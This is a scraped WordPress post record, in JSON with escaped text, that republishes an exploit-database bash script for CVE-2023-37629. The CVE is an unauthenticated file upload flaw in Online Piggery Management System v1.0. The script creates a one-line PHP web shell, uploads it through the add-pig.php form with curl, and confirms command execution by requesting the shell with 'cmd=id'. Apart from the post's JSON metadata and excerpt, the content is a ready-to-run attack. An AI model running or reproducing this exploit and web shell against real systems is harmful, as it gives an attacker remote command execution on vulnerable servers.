#!\/bin\/bash
\n# Exploit Title: Online Piggery Management System v1.0 – unauthenticated file upload vulnerability
\n# Date: July 12 2023
\n# Exploit Author: 1337kid
\n# Software Link: https:\/\/www.sourcecodester.com\/php\/11814\/online-pig-management-system-basic-free-version.html
\n# Version: 1.0
\n# Tested on: Ubuntu
\n# CVE : CVE-2023-37629
\n#
\n# chmod +x exploit.sh
\n# .\/exploit.sh web_url
\n# .\/exploit.sh http:\/\/127.0.0.1:8080\/<\/p>\n
echo ” _____ _____ ___ __ ___ ____ ________ __ ___ ___ ”
\necho ” \/ __\\\\ \\\\ \/ \/ __|_|_ ) \\\\_ )__ \/__|__ \/__ \/ \/|_ ) _ \\\\”
\necho ” | (__ \\\\ V \/| _|___\/ \/ () \/ \/ |_ \\\\___|_ \\\\ \/ \/ _ \\\\\/ \/\\\\_, \/”
\necho ” \\\\___| \\\\_\/ |___| \/___\\\\__\/___|___\/ |___\/\/_\/\\\\___\/___|\/_\/ ”
\necho ” @1337kid”
\necho<\/p>\n
if [[ $1 == ” ]]; then
\necho “No URL specified!”
\nexit
\nfi<\/p>\n
base_url=$1<\/p>\n
unauth_file_upload() {
\n# CVE-2023-37629 – File upload vuln
\necho “Generating shell.php”
\n#===========
\ncat > shell.php << EOF
\n<?php system(\\$_GET[‘cmd’]); ?>
\nEOF
\n#===========
\necho “done”
\ncurl -s -F pigphoto=@shell.php -F submit=pwned $base_url\/add-pig.php > \/dev\/null
\nreq=$(curl -s -I $base_url”uploadfolder\/shell.php?cmd=id” | head -1 | awk ‘{print $2}’)
\nif [[ $req == “200” ]]; then
\necho “Shell uploaded to $(echo $base_url)uploadfolder\/shell.php”
\nelse
\necho “Failed to upload a shell”
\nfi<\/p>\n
}<\/p>\n
req=$(curl -I -s $base_url | head -1 | awk ‘{print $2}’)
\nif [[ $req -eq “200” ]]; then
\nunauth_file_upload
\nelse
\necho “Error”
\necho “Status Code: $req”
\nfi<\/p>\n","protected":false},"excerpt":{"rendered":"
#!\/bin\/bash # Exploit Title: Online Piggery Management System v1.0 – unauthenticated file upload vulnerability # Date: July 12 2023 # Exploit Author: 1337kid # Software Link: https:\/\/www.sourcecodester.com\/php\/11814\/online-pig-management-system-basic-free-version.html # Version: 1.0 # Tested on: Ubuntu # CVE : CVE-2023-37629 # # chmod +x exploit.sh # .\/exploit.sh web_url # .\/exploit.sh http:\/\/127.0.0.1:8080\/ echo ” _____ _____ ___ __ …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-45365","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45365","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=45365"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45365\/revisions"}],"predecessor-version":[{"id":45466,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/45365\/revisions\/45466"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=45365"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=45365"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=45365"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}